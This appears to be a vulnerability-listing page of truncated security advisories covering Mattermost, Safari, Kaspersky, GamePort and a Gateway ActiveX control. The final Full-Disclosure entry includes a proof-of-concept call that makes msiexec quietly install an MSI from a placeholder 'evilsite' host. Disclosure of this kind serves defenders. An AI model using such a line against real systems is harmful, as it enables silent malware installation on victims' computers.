CVE-2026-4858 Path traversal in integration action URL leading to arbitrary API execution via system admin’s auth token.

Mattermost versions 11.6.x = 11.6.0, 11.5.x = 11.5.3, 11.4.x = 11.4.4, 10.11.x = 10.11.14 fail to check integration URL for path traversal which allows an malicious authenticated user to call an arbitrary API via system admin Mattermost auth token using via path traversal in integration action...

(Pwn2Own) Apple Safari Symbolic Link Arbitrary Application Execution Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Apple Safari. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of symboli...

PT-2017-04: Security Restrictions Bypass in Kaspersky Embedded Systems Security

The specialists of the Positive Research center have detected a Security Restrictions Bypass vulnerability in Kaspersky Embedded Systems Security. Vulnerability in the Application Control component of Kaspersky Embedded Systems Security allows attackers to gain privileges and execute arbitrary...

Interactive Studio GamePort 3.0/3.1/4.0 Arbitrary application execution

No description provided by source. source: http://www.securityfocus.com/bid/12006/info Gameport is reported prone to multiple vulnerabilities in the client and server. These issues may allow an attacker to gain unauthorized access to a vulnerable server and execute arbitrary code on a vulnerable...

Re: [Full-disclosure] Gateway WebLaunch ActiveX Control Insecure Method

I was playing with this a bit more. Everybody has the Windows Installer installed, right? How about this: obj.DoWebLaunch"","........windowssystem32msiexec.exe", "","/i http://www.evilsite.com/evilapp.msi /quiet"; Elazar On Tue, 08 Jan 2008 20:08:53 -0500 [email protected] wrote: The DoWebLaunc...